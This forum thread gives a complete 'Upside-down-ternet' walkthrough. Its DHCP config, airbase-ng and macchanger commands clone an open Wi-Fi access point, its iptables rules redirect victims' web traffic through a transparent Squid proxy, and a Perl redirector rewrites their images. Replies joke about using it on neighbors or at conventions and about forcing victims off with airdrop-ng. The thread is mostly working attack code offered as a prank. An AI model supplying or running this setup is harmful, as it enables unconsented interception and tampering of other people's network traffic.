Upside-down-ternet example

[qettyz]

This is UPSIDE-DOWN-TERNET example

Result will be something like this (YouTube).


Step 1.

Set up you dhcpd.conf

Code:

option domain-name-servers 208.67.222.220, 208.67.222.222; #OPENDNS, YOU CAN CHANGE THESE
default-lease-time 60;
max-lease-time 72;
ddns-update-style none;
authoritative;
log-facility local7;

subnet 10.0.0.0 netmask 255.255.255.0 {
interface at0;
range 10.0.0.100 10.0.0.254;
option routers 10.0.0.1;
option domain-name-servers 208.67.222.220, 208.67.222.222;
}

Step 2.
Edit and insert little rediction script to you proxy server =)
This downloads all the images to the local apache server and flips them, after
that they are served towards.

Code:

#!/usr/bin/perl
$|=1;
$count = 0;
$pid = $$;
while (<>) {
chomp $_; if ($_ =~ /(.*\.jpg)/i) {
$url = $1;
system("/usr/bin/wget", "-q", "-O","/var/www/images/$pid-$count.jpg", "$url");
system("/usr/bin/mogrify", "-flip","/var/www/images/$pid-$count.jpg");
system("chmod", "666", "/var/www/images/$pid-$count.jpg");
print "http://10.0.0.1/images/$pid-$count.jpg\n";
}
elsif ($_ =~ /(.*\.gif)/i) {
$url = $1;
system("/usr/bin/wget", "-q", "-O","/var/www/images/$pid-$count.gif", "$url");
system("/usr/bin/mogrify", "-flip","/var/www/images/$pid-$count.gif");
system("chmod", "666", "/var/www/images/$pid-$count.gif");
print "http://10.0.0.1/images/$pid-$count.gif\n";
}
else {
print "$_\n";;
}
$count++;
}

Set up apache up.
Set up squid running on you localhost as transparent proxy.



Step 3.
Set up a AP-clone for your previous open WLAN-AP

Code:

airmon-ng start wlan0
ifconfig mon0 down
macchanger -r XX:XX:XX:XX:XX:XX mon0 
ifconfig mon0 up
airbase-ng -W 0 -e ESSID -c 6 mon0
ifconfig at0 up
ifconfig at0 10.0.0.1 netmask 255.255.255.0
route add -net 10.0.0.0 netmask 255.255.255.0 gw 10.0.0.1
/etc/init.d/dhcp3-server restart
/etc/init.d/apache2 restart
/etc/init.d/squid restart

Step 4.
Configure iptables to route traffic thru your proxy server what is running at port 3128

Code:

iptables --flush
iptables --table nat --flush
iptables --delete-chain
iptables --table nat --delete-chain
echo 1 > /proc/sys/net/ipv4/ip_forward
echo 1 > /proc/sys/net/ipv4/conf/ppp0/forwarding
echo 1 > /proc/sys/net/ipv4/conf/wlan0/forwarding
echo 1 > /proc/sys/net/ipv4/conf/at0/forwarding
iptables --table nat --append POSTROUTING --out-interface ppp0 -j MASQUERADE 
iptables --append FORWARD --in-interface at0 -j ACCEPT
iptables -t nat -A PREROUTING -p udp -s 10.0.0.0/24 --dport 53 -j ACCEPT
iptables -t nat -A PREROUTING -p tcp -m tcp -s 10.0.0.0/24 --dport 80 -j DNAT --to-destination 10.0.0.1:3128

Note: you maybe wanna add your own rules to the iptables.



Good luck =)

Gredits to Pete.

[Onemajorflaw]

Neat trick, but a little too laborious for something without visable results (i.e. you won't see their reaction, or they may not even go to a website with images). You may want to rephrase the "do this to your neighbors" part, just in case. =)

[qettyz]

Ok first post is now editited to just how to upside-down-ternet =)

Allso addon on to this, you can replace the flip with everything you want to. Why not just copy you favorite picture to replace, or maybe something else.

[Onemajorflaw]

Ok first post is now editited to just how to upside-down-ternet =)

Allso addon on to this, you can replace the flip with everything you want to. Why not just copy you favorite picture to replace, or maybe something else.

Looks more legal now =) I definately like the script to redirect all traffic to any website (tutorial uses Kittenwar! May The Cutest Kitten Win!!). Good find.

[Barry]

Neat trick, but a little too laborious for something without visable results (i.e. you won't see their reaction, or they may not even go to a website with images). You may want to rephrase the "do this to your neighbors" part, just in case. =)

Oh, I don't know. It's fun at the Cons.

You'll need to run airdrop-ng for my comment to work.

[qettyz]

I dont see use for airdrop-ng, if you are not gonna push your upsite-down-ternet by force.

If i just setup close from my previous open wlan with airbase-ng, change the mac-address to match, its up to leechers who connects to the network back again and their lost.

Sure there is many ways to use this, i prefer the open way, not forcing it.